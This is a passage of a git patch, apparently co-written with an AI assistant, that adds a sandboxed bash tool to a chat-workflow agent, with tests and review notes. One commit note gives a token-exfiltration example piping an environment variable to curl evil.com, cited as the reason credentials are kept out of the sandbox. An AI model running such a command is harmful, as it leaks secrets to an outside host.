`experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 34 ++-- app/lib/workflows/runAgentWorkflow.ts | 32 ++-- lib/agent/__tests__/buildAgentTools.test.ts | 17 ++ lib/agent/buildAgentTools.ts | 20 +++ lib/agent/tools/AgentContext.ts | 34 ++++ lib/agent/tools/__tests__/bashTool.test.ts | 158 ++++++++++++++++++ .../__tests__/buildRecoupExecEnv.test.ts | 31 ++++ lib/agent/tools/__tests__/getSandbox.test.ts | 39 +++++ .../tools/__tests__/isAgentContext.test.ts | 42 +++++ lib/agent/tools/bashTool.ts | 116 +++++++++++++ lib/agent/tools/buildRecoupExecEnv.ts | 30 ++++ lib/agent/tools/getSandbox.ts | 28 ++++ lib/agent/tools/isAgentContext.ts | 26 +++ lib/agents/generalAgent/getGeneralAgent.ts | 5 +- lib/chat/const.ts | 13 ++ lib/chat/handleChatWorkflowStream.ts | 20 +++ 16 files changed, 615 insertions(+), 30 deletions(-) create mode 100644 lib/agent/__tests__/buildAgentTools.test.ts create mode 100644 lib/agent/buildAgentTools.ts create mode 100644 lib/agent/tools/AgentContext.ts create mode 100644 lib/agent/tools/__tests__/bashTool.test.ts create mode 100644 lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts create mode 100644 lib/agent/tools/__tests__/getSandbox.test.ts create mode 100644 lib/agent/tools/__tests__/isAgentContext.test.ts create mode 100644 lib/agent/tools/bashTool.ts create mode 100644 lib/agent/tools/buildRecoupExecEnv.ts create mode 100644 lib/agent/tools/getSandbox.ts create mode 100644 lib/agent/tools/isAgentContext.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index 352dcd265..f9a894195 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -1,27 +1,36 @@ import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai"; import { gateway } from "@ai-sdk/gateway"; import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; +import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; +import { buildAgentTools } from "@/lib/agent/buildAgentTools"; +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentStepInput = { messages: UIMessage[]; modelId: string; writable: WritableStream; + /** + * Threaded into `streamText`'s `experimental_context` so each tool's + * `execute` callback can read the sandbox state + per-prompt context. + */ + agentContext: AgentContext; }; /** - * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow - * `"use step"` so that: + * One LLM turn (with internal tool-call iteration) in the chat workflow. + * Runs as a Vercel Workflow `"use step"` so: * * - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside. * - The result is cached as a single durable event — replays after a crash - * do not re-bill the model. + * do not re-bill the model or re-execute tools. * - * Currently emits a plain text response with no tools. Sandbox tools land in - * the follow-up PR (port `@open-harness/agent` tools + wire via - * `experimental_context`). + * `streamText` drives the tool-call → tool-result → next-LLM-call loop + * internally using its default stop condition. Our outer workflow stays + * single-turn for now — multi-turn message threading lands when the rest + * of the tool surface ports in a follow-up PR. * - * @param input - Messages + selected model + the workflow's writable stream. - * @returns finishReason from the model run (for the workflow loop's break condition). + * @param input - Messages + selected model + writable stream + agent context. + * @returns finishReason from the model run. */ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> { "use step"; @@ -29,17 +38,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe console.log("[runAgentStep] start", { modelId: input.modelId, messageCount: input.messages.length, + hasSandboxState: Boolean(input.agentContext.sandbox?.state), }); const modelMessages = convertToModelMessages(input.messages); + const tools = buildAgentTools(); const result = streamText({ model: gateway(input.modelId), system: agentCustomInstructions, messages: modelMessages, + tools, + stopWhen: CHAT_AGENT_STOP_WHEN, + experimental_context: input.agentContext, }); - // Acquire the writer once and release in `finally` — re-acquiring per chunk - // (the previous shape) leaked the lock when any write threw. + // Acquire the writer once and release in `finally` so a thrown chunk + // doesn't leak the lock. const writer = input.writable.getWriter(); try { for await (const part of result.toUIMessageStream()) { diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts index db679145a..ce65b0bb3 100644 --- a/app/lib/workflows/runAgentWorkflow.ts +++ b/app/lib/workflows/runAgentWorkflow.ts @@ -1,12 +1,18 @@ import { getWritable } from "workflow"; import type { UIMessage, UIMessageChunk } from "ai"; import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentWorkflowInput = { messages: UIMessage[]; chatId: string; sessionId: string; modelId: string; + /** + * Threaded into `streamText`'s `experimental_context` so tools (bash et al.) + * can read sandbox state + per-prompt Recoup creds. + */ + agentContext: AgentContext; }; /** @@ -15,18 +21,14 @@ export type RunAgentWorkflowInput = { * client; this function writes UIMessage chunks into the workflow's writable * via `runAgentStep`. * - * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is - * unsafe today: each iteration would re-send the original prompt without - * the assistant's tool-call response in scope, so a `tool-calls` finish - * reason would loop forever on the same input. The proper multi-turn - * shape (where the step appends its response to `messages` before the - * next iteration) lands with the sandbox-tool port in PR 4. - * - * Until then, if the model returns `tool-calls` we log a warning and exit - * — the client receives the partial tool-call chunks but no follow-up turn. + * Currently runs a SINGLE `runAgentStep` turn. Tool-call iteration (up to + * MAX_TOOL_STEPS) happens INSIDE `streamText` via `stopWhen` — so the + * single workflow turn covers the full "user → assistant → tool → tool + * result → assistant" cycle without our outer loop having to thread + * messages between iterations. * * WDK constraints honored: - * - All I/O (streamText, fetches) lives in `"use step"` functions. + * - All I/O (streamText, sandbox.exec, fetches) lives in `"use step"` functions. * - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto. */ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise { @@ -43,14 +45,8 @@ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise { + it("returns a tools record keyed by tool name", () => { + const tools = buildAgentTools(); + expect(tools).toHaveProperty("bash"); + expect(typeof tools.bash).toBe("object"); + }); + + it("each tool has an inputSchema, description, and execute", () => { + const tools = buildAgentTools(); + expect(tools.bash.inputSchema).toBeDefined(); + expect(tools.bash.description).toBeDefined(); + expect(typeof tools.bash.execute).toBe("function"); + }); +}); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts new file mode 100644 index 000000000..be6bde085 --- /dev/null +++ b/lib/agent/buildAgentTools.ts @@ -0,0 +1,20 @@ +import { bashTool } from "@/lib/agent/tools/bashTool"; + +/** + * Factory for the full agent tool set passed into `streamText({ tools })`. + * Each tool reads its sandbox handle + recoup creds from `experimental_context` + * at execute time — the factory takes no arguments because the tools are + * stateless modulo that context. + * + * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`, + * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`, + * `fetch`) port in follow-up PRs and slot into this record one-by-one + * without changing the factory signature. + */ +export function buildAgentTools() { + return { + bash: bashTool(), + }; +} + +export type AgentTools = ReturnType; diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts new file mode 100644 index 000000000..63d2a1b7e --- /dev/null +++ b/lib/agent/tools/AgentContext.ts @@ -0,0 +1,34 @@ +import type { VercelState } from "@/lib/sandbox/vercel/state"; + +/** + * Per-tool-call context threaded into the agent via `streamText`'s + * `experimental_context`. Mirrors the open-agents `AgentContext` shape + * (subset — slim PR 4 ports only the `bash` tool, so context only needs + * what `bash` reads). + * + * Why no `recoupAccessToken` field? A short-lived per-prompt credential + * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call + * back to recoup-api as the caller. We deliberately omit it here — the + * legacy api-key path is too long-lived to expose inside a sandbox where + * model-issued bash commands can read env. Proper short-lived token + * minting lands alongside the `skill` tool port. + */ +export type AgentContext = { + /** + * Persistable sandbox state. Tools reconnect via `connectVercel(state)` — + * we never pass a live `Sandbox` instance through context because + * workflow durability requires replay-friendly inputs. + */ + sandbox: { + state: VercelState; + workingDirectory: string; + currentBranch?: string; + }; + /** + * Organization UUID when the sandbox was opened against a recoupable + * org repo (`org--`). Forwarded to sandboxed commands as + * `RECOUP_ORG_ID` so future `recoup-api` skill calls scope to that org. + * Public information — no security risk in exposing. + */ + recoupOrgId?: string; +}; diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts new file mode 100644 index 000000000..da9a999d3 --- /dev/null +++ b/lib/agent/tools/__tests__/bashTool.test.ts @@ -0,0 +1,158 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { bashTool } from "@/lib/agent/tools/bashTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const baseContext = { + sandbox: { state: { sandboxName: "session-x" }, workingDirectory: "/sandbox/mono" }, +}; + +function makeSandbox(overrides: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + exec: vi.fn(), + execDetached: vi.fn(), + ...overrides, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("bashTool.execute", () => { + it("executes a command via sandbox.exec in the sandbox's working directory", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "README.md\npackage.json", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = await tool.execute!({ command: "ls" }, { + experimental_context: baseContext, + } as never); + expect(result).toEqual({ + success: true, + exitCode: 0, + stdout: "README.md\npackage.json", + stderr: "", + }); + expect(sandbox.exec).toHaveBeenCalledWith( + "ls", + "/sandbox/mono", + expect.any(Number), + expect.any(Object), + ); + }); + + it("includes `truncated: true` in the result when sandbox.exec truncated output", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "lots of output", + stderr: "", + truncated: true, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "find ." }, { + experimental_context: baseContext, + } as never)) as { truncated?: boolean }; + expect(result.truncated).toBe(true); + }); + + it("resolves a workspace-relative cwd against sandbox.workingDirectory", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "ls", cwd: "apps/web" }, { + experimental_context: baseContext, + } as never); + expect(sandbox.exec).toHaveBeenCalledWith( + "ls", + "/sandbox/mono/apps/web", + expect.any(Number), + expect.any(Object), + ); + }); + + it("injects RECOUP_ORG_ID into the exec env when present in context", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "curl example.com" }, { + experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, + } as never); + const opts = sandbox.exec.mock.calls[0]?.[3] as { env?: Record }; + expect(opts.env).toEqual({ RECOUP_ORG_ID: "org-uuid" }); + }); + + it("returns the detached commandId when called with detached:true", async () => { + const sandbox = makeSandbox({ + execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-123" }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: baseContext, + } as never)) as { success: boolean; stdout: string }; + expect(result.success).toBe(true); + expect(result.stdout).toMatch(/cmd-123/); + expect(sandbox.execDetached).toHaveBeenCalledWith("npm run dev", "/sandbox/mono"); + }); + + it("returns success:false with a descriptive stderr when the sandbox lacks execDetached", async () => { + const sandbox = makeSandbox({ execDetached: undefined }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: baseContext, + } as never)) as { success: boolean; stderr: string }; + expect(result.success).toBe(false); + expect(result.stderr).toMatch(/detached mode is not supported/i); + }); + + it("does NOT inject env vars on detached execs", async () => { + const sandbox = makeSandbox({ + execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-1" }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, + } as never); + // execDetached signature is (command, cwd) — no env arg. + expect(sandbox.execDetached.mock.calls[0]).toHaveLength(2); + }); +}); diff --git a/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts new file mode 100644 index 000000000..3422fd662 --- /dev/null +++ b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts @@ -0,0 +1,31 @@ +import { describe, it, expect } from "vitest"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; + +const baseSandbox = { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }; + +describe("buildRecoupExecEnv", () => { + it("returns undefined when no context", () => { + expect(buildRecoupExecEnv(undefined)).toBeUndefined(); + expect(buildRecoupExecEnv(null)).toBeUndefined(); + expect(buildRecoupExecEnv("not-a-context")).toBeUndefined(); + }); + + it("returns undefined when context has no recoupOrgId", () => { + expect(buildRecoupExecEnv({ sandbox: baseSandbox })).toBeUndefined(); + }); + + it("injects RECOUP_ORG_ID when present in context", () => { + const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "org-uuid" }); + expect(env).toEqual({ RECOUP_ORG_ID: "org-uuid" }); + }); + + it("ignores empty-string recoupOrgId", () => { + const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "" }); + expect(env).toBeUndefined(); + }); + + it("returns undefined when the input is not a valid AgentContext shape", () => { + expect(buildRecoupExecEnv({ recoupOrgId: "org-uuid" })).toBeUndefined(); + expect(buildRecoupExecEnv({ sandbox: null, recoupOrgId: "org-uuid" })).toBeUndefined(); + }); +}); diff --git a/lib/agent/tools/__tests__/getSandbox.test.ts b/lib/agent/tools/__tests__/getSandbox.test.ts new file mode 100644 index 000000000..a14122f81 --- /dev/null +++ b/lib/agent/tools/__tests__/getSandbox.test.ts @@ -0,0 +1,39 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +beforeEach(() => vi.clearAllMocks()); + +describe("getSandbox", () => { + it("reconnects via connectVercel(state) and returns the sandbox", async () => { + const fakeSandbox = { workingDirectory: "/sandbox/mono" }; + vi.mocked(connectVercel).mockResolvedValue(fakeSandbox as never); + const state = { sandboxName: "session-xyz" }; + const result = await getSandbox( + { sandbox: { state, workingDirectory: "/sandbox/mono" } }, + "bash", + ); + expect(result).toBe(fakeSandbox); + expect(connectVercel).toHaveBeenCalledWith(state); + }); + + it("throws a descriptive error when context is missing entirely", async () => { + await expect(getSandbox(undefined, "bash")).rejects.toThrow(/Sandbox state missing/); + }); + + it("throws when sandbox.state is missing", async () => { + await expect( + getSandbox({ sandbox: { workingDirectory: "/x" } } as never, "bash"), + ).rejects.toThrow(/Sandbox state missing/); + }); + + it("throws when sandbox.workingDirectory is empty (tightened guard)", async () => { + await expect( + getSandbox({ sandbox: { state: {}, workingDirectory: "" } } as never, "bash"), + ).rejects.toThrow(/Sandbox state missing/); + }); +}); diff --git a/lib/agent/tools/__tests__/isAgentContext.test.ts b/lib/agent/tools/__tests__/isAgentContext.test.ts new file mode 100644 index 000000000..29ad4f29d --- /dev/null +++ b/lib/agent/tools/__tests__/isAgentContext.test.ts @@ -0,0 +1,42 @@ +import { describe, it, expect } from "vitest"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +describe("isAgentContext", () => { + it("returns true for a well-formed context", () => { + expect( + isAgentContext({ + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, + }), + ).toBe(true); + }); + + it("returns false for non-object inputs", () => { + expect(isAgentContext(undefined)).toBe(false); + expect(isAgentContext(null)).toBe(false); + expect(isAgentContext("nope")).toBe(false); + expect(isAgentContext(42)).toBe(false); + }); + + it("returns false when sandbox is missing", () => { + expect(isAgentContext({})).toBe(false); + }); + + it("returns false when sandbox is null", () => { + expect(isAgentContext({ sandbox: null })).toBe(false); + }); + + it("returns false when sandbox is empty (missing state and workingDirectory)", () => { + expect(isAgentContext({ sandbox: {} })).toBe(false); + }); + + it("returns false when sandbox.state is missing or null", () => { + expect(isAgentContext({ sandbox: { workingDirectory: "/x" } })).toBe(false); + expect(isAgentContext({ sandbox: { state: null, workingDirectory: "/x" } })).toBe(false); + }); + + it("returns false when sandbox.workingDirectory is missing, non-string, or empty", () => { + expect(isAgentContext({ sandbox: { state: {} } })).toBe(false); + expect(isAgentContext({ sandbox: { state: {}, workingDirectory: 42 } })).toBe(false); + expect(isAgentContext({ sandbox: { state: {}, workingDirectory: "" } })).toBe(false); + }); +}); diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts new file mode 100644 index 000000000..908113812 --- /dev/null +++ b/lib/agent/tools/bashTool.ts @@ -0,0 +1,116 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; + +const TIMEOUT_MS = 120_000; + +const bashInputSchema = z.object({ + command: z.string().describe("The bash command to execute"), + cwd: z + .string() + .optional() + .describe("Workspace-relative working directory for the command (e.g., apps/web)"), + detached: z + .boolean() + .optional() + .describe( + "Use this whenever you want to run a persistent server in the background (e.g., npm run dev, next dev). The command starts and returns immediately without waiting for it to finish.", + ), +}); + +/** + * Factory for the `bash` sandbox tool. Runs `bash -c ""` inside + * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's + * working directory. + * + * Approval gating is intentionally absent — model-issued commands are + * trusted in this PR. Add a host-side gate at the route/UI layer if that + * changes. + * + * Foreground execs receive `RECOUP_ORG_ID` from agent context (when the + * sandbox is org-scoped) so future `recoup-api` skill calls can scope to + * the right org. Detached execs deliberately skip env injection — those + * processes outlive the prompt. + */ +export const bashTool = () => + tool({ + description: `Execute a bash command in the user's shell (non-interactive). + +WHEN TO USE: +- Running existing project commands (build, test, lint, typecheck) +- Using read-only CLI tools (git status, git diff, ls, etc.) +- Invoking language/package managers (npm, pnpm, yarn, pip, go, etc.) as part of the task + +WHEN NOT TO USE: +- Reading files (use the file read tool instead, once available) +- Editing or creating files (use file edit/write tools, once available) +- Searching code or text (use grep / glob tools, once available) +- Interactive commands (shells, editors, REPLs) + +USAGE: +- Runs bash -c "" in a non-interactive shell (no TTY/PTY) +- Commands run in the sandbox working directory by default — do NOT prepend "cd /path &&" +- Use the cwd parameter ONLY with a workspace-relative subdirectory +- Commands automatically timeout after ~2 minutes +- Combined stdout/stderr output is truncated after ~50,000 characters + +IMPORTANT: +- Never chain commands with ';' or '&&' — use separate tool calls +- Never use interactive commands (vim, nano, top, bash, ssh, etc.) +- Always quote file paths that may contain spaces +- Use detached: true to start dev servers / long-running processes in the background`, + inputSchema: bashInputSchema, + execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { + const sandbox = await getSandbox(experimental_context, "bash"); + const workingDirectory = sandbox.workingDirectory; + const workingDir = cwd + ? path.isAbsolute(cwd) + ? cwd + : path.resolve(workingDirectory, cwd) + : workingDirectory; + + if (detached) { + if (!sandbox.execDetached) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: + "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.", + }; + } + try { + const { commandId } = await sandbox.execDetached(command, workingDir); + return { + success: true, + exitCode: null, + stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, + stderr: "", + }; + } catch (error) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: error instanceof Error ? error.message : String(error), + }; + } + } + + const recoupEnv = buildRecoupExecEnv(experimental_context); + const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { + signal: abortSignal, + ...(recoupEnv ? { env: recoupEnv } : {}), + }); + + return { + success: result.success, + exitCode: result.exitCode, + stdout: result.stdout, + stderr: result.stderr, + ...(result.truncated && { truncated: true }), + }; + }, + }); diff --git a/lib/agent/tools/buildRecoupExecEnv.ts b/lib/agent/tools/buildRecoupExecEnv.ts new file mode 100644 index 000000000..6eaf3015f --- /dev/null +++ b/lib/agent/tools/buildRecoupExecEnv.ts @@ -0,0 +1,30 @@ +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Build a per-invocation env override carrying Recoupable sandbox context + * so outbound shell commands (curl, scripts, the `recoup-api` skill) can + * scope requests correctly without any state persisting on the sandbox. + * + * Currently injects only `RECOUP_ORG_ID` — a public identifier. Auth-token + * injection is deliberately NOT included here; a long-lived api key in the + * sandbox env would be readable by any model-issued bash command. Proper + * short-lived token minting will land alongside the `skill` tool port + * (when there's an actual consumer for it). + * + * Returns `undefined` when nothing is available to inject so callers can + * cleanly spread a conditional `...(env ? { env } : {})` into exec opts. + * + * @param experimental_context - The opaque context object passed by AI SDK to tool execute. + */ +export function buildRecoupExecEnv( + experimental_context: unknown, +): Record | undefined { + if (!isAgentContext(experimental_context)) return undefined; + + const env: Record = {}; + if (experimental_context.recoupOrgId) { + env.RECOUP_ORG_ID = experimental_context.recoupOrgId; + } + + return Object.keys(env).length > 0 ? env : undefined; +} diff --git a/lib/agent/tools/getSandbox.ts b/lib/agent/tools/getSandbox.ts new file mode 100644 index 000000000..be6c46605 --- /dev/null +++ b/lib/agent/tools/getSandbox.ts @@ -0,0 +1,28 @@ +import type { Sandbox } from "@/lib/sandbox/interface"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Resolve a connected `Sandbox` instance from `experimental_context`. + * Reconnects each call via `connectVercel(state)` rather than caching the + * handle on context — workflow durability requires that side-effecting + * resources (sandbox sessions) be re-acquired inside the step that uses + * them, not passed across event boundaries. + * + * @param experimental_context - The opaque context object passed by AI SDK to tool execute. + * @param toolName - Optional tool name to surface in error messages. + */ +export async function getSandbox( + experimental_context: unknown, + toolName?: string, +): Promise { + if (!isAgentContext(experimental_context)) { + const where = toolName ? ` (tool: ${toolName})` : ""; + throw new Error( + `Sandbox state missing from agent context${where}. ` + + "Ensure the workflow start payload includes `sandbox.state` and that " + + "runAgentStep threads it via experimental_context.", + ); + } + return connectVercel(experimental_context.sandbox.state); +} diff --git a/lib/agent/tools/isAgentContext.ts b/lib/agent/tools/isAgentContext.ts new file mode 100644 index 000000000..0049ac010 --- /dev/null +++ b/lib/agent/tools/isAgentContext.ts @@ -0,0 +1,26 @@ +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; + +/** + * Type-guard that confirms an arbitrary `experimental_context` shape has + * the AgentContext fields tools rely on at runtime. Validates each required + * leaf (sandbox object, state object, non-empty workingDirectory) so callers + * can trust the narrowed type — earlier weaker guards returned true for + * `{ sandbox: null }` or `{ sandbox: {} }`, letting tools later crash on + * "cannot read .x of undefined". + * + * @param value - The opaque context object passed by AI SDK to tool execute. + */ +export function isAgentContext(value: unknown): value is AgentContext { + if (typeof value !== "object" || value === null) return false; + + const candidate = value as { sandbox?: unknown }; + const sandbox = candidate.sandbox; + if (typeof sandbox !== "object" || sandbox === null) return false; + + const sandboxFields = sandbox as { state?: unknown; workingDirectory?: unknown }; + if (typeof sandboxFields.state !== "object" || sandboxFields.state === null) return false; + if (typeof sandboxFields.workingDirectory !== "string") return false; + if (sandboxFields.workingDirectory.length === 0) return false; + + return true; +} diff --git a/lib/agents/generalAgent/getGeneralAgent.ts b/lib/agents/generalAgent/getGeneralAgent.ts index 7c2c9407b..e4bc4fc56 100644 --- a/lib/agents/generalAgent/getGeneralAgent.ts +++ b/lib/agents/generalAgent/getGeneralAgent.ts @@ -1,4 +1,5 @@ -import { stepCountIs, ToolLoopAgent } from "ai"; +import { ToolLoopAgent } from "ai"; +import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { AnthropicProviderOptions } from "@ai-sdk/anthropic"; import { GoogleGenerativeAIProviderOptions } from "@ai-sdk/google"; import { OpenAIResponsesProviderOptions } from "@ai-sdk/openai"; @@ -52,7 +53,7 @@ export default async function getGeneralAgent(body: ChatRequestBody): Promise